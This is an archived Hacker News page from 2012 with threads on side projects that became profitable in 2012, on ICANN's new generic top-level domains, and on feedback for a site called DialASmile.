Try using powertop to help tweak power settings Linux may have overlooked by default. It's in the repos, last time I checked.
25
A weird but useful bug in iOS 5.1.1
2 points by roquin  1 day ago   discuss
27
Ask HN: who started something in 2012 which is already profitable?
210 points by withinthreshold  8 days ago   190 comments top 6
1
there 8 days ago 6 replies      
I created a push notification service called Pushover (https://pushover.net/) and wrote its iOS and Android apps. I started the project in January and launched it in March (https://jcs.org/pushover).

In contrast to some competing free apps/services, the Pushover mobile apps are $3.99 which pays for the monthly hosting costs to keep the service running. Both apps are highly rated on both app stores and so far the app sales have paid for the domain name and other tangible development costs and are continuing to generate profit. I just purchased a Blackberry phone for development and plan to create a Blackberry app for the service.

2
coderdude 8 days ago 6 replies      
Beware of posts like this from what is basically a new account with only as much karma as this post has received.

Sharks and all that: http://news.ycombinator.com/item?id=4017843

(Am I paranoid much?)

3
markchristian 8 days ago 5 replies      
I launched a Mac utility app called DragonDrop (https://shinyplasticbag.com/dragondrop/) that got a lot of pretty good press (including getting fireballed - here's the HN discussion http://news.ycombinator.com/item?id=3946404).
4
einaregilsson 8 days ago 7 replies      
I created a few javascript card games, most of them in late 2011, but they really started earning this year. So far I have made Spades, Hearts, Go Fish, Crazy Eights, Shithead and a couple of solitaires. Revenue has been steadily rising, and I'm getting ~1500$ next month. The nice thing is that they're completely maintenance free, there are no user accounts, no serverside anything, they just sit there and make money. http://www.spades-cardgame.com is one, the rest are linked from there.
5
jazzychad 8 days ago 1 reply      
I created ExportMyPosts after the Posterous acquisition so people could export and backup their blogs' data - http://exportmyposts.com/ - it has made more revenue than it costs for the hosting and servers, but not enough to pay a salary or anything. There are a few promo codes left, use HACKERNEWS at checkout.

I also made StepStats - http://StepStats.com/ - for better FitBit data visualization; it's free, but enough people have donated money that it has covered all costs involved.

6
mittermayr 8 days ago  replies      
I created fruji.com, a simple Twitter Analytics service and offered $5 and $25 accounts. People just keep buying accounts! It's fascinating!!!

This was a weekend project and it performs already way better (a few weeks in) than my 1.5 year startup (which is something completely different).

That's some scary shit right there. Purely fascinating.

28
Ask HN: Shouldn't gTLDs be non-generic?
19 points by aeurielesn  2 days ago   21 comments top 11
1
MPSimmons 2 days ago 1 reply      
Tragedy of the commons.

Plus greed on the part of ICANN. You can only sell one .google TLD, but there are thousands of relevant words in the dictionary for anyone with a deep enough coin purse.

2
darxius 2 days ago 1 reply      
What will this mean for Chrome users who use the address bar also as a search bar for their favorite search engine? If apple, for example, owns 'http://apple', what would happen when I type 'apple' in the search bar? What if I'm actually searching for pictures of apples? Scary stuff.
3
eli 2 days ago 1 reply      
Couldn't you say the same for .com domains? Is it fair that one company gets to own search.com?
4
gyardley 2 days ago 1 reply      
Heh. You want to see generic, check out Verisign's applications. '.com' in a whole bunch of scripts other than Latin - they've applied for the Cyrillic script 'ком', the Hebrew script 'קוֹם', and what I assume is the same thing in a bunch of languages I don't read.

On the other hand, I'm sure they'll make them publicly available - for the right price.

5
JamesPeterson 2 days ago 0 replies      
The ICANN administration is notorious for its motives. While a public organization, many of its decisions are clearly to benefit their own and are clearly not in the public benefit.
6
SkyMarshal 1 day ago 0 replies      
I've always thought the entire TLD taxonomy was an ugly, unsystematic hack, but I can't actually think of a better way to do it.

Were any alternative methods of allocating TLDs ever proposed?

7
personlurking 2 days ago 0 replies      
Generic gTLDs should remain free for all to use. Of course, this makes it hard for some companies whose names are generic but to me app.apple is easy enough to remember. Amazon.books? Perfect. Google.books? Works well, too. From a user/customer point of view, making generic gTLDs non-purchasable makes perfect sense.
8
watmough 2 days ago 0 replies      
Who cares. This is just another way to fleece idiots.

How are those non-standard .cc addresses working out for everyone.

9
buster 2 days ago 0 replies      
Thought the same. Most of those are ridiculous...
10
lambada 2 days ago 0 replies      
I agree with your point, but your specific example is flawed as Apple did not apply for .app.
11
mparlane 2 days ago 1 reply      
The fact that apple will literally control http://apple/ is more scary.
29
What happened with the Hacker News podcast?
4 points by Tzeentch99  1 day ago   discuss
30
Show HN: DialASmile - tell people why you love them, even when you're not around
7 points by jodoglevy  2 days ago   4 comments top 2
1
X4 2 days ago 1 reply      
Integration:

Nice idea, but you should link that lonely island to twitter/facebook as (Mobile-/Web-)App for higher availability.

Design:

The Twitter bootstrap looks ugly. Why not use warmer colors and stock photos that spread a warmer feel. Customizable SmilePages that contain all the love at a secure/private link would also help spreading.

2
youngdev 2 days ago 1 reply      
Nice idea. Put more information on some pages i.e. About. Also are you using Twillo?
       cached 18 June 2012 16:05:01 GMT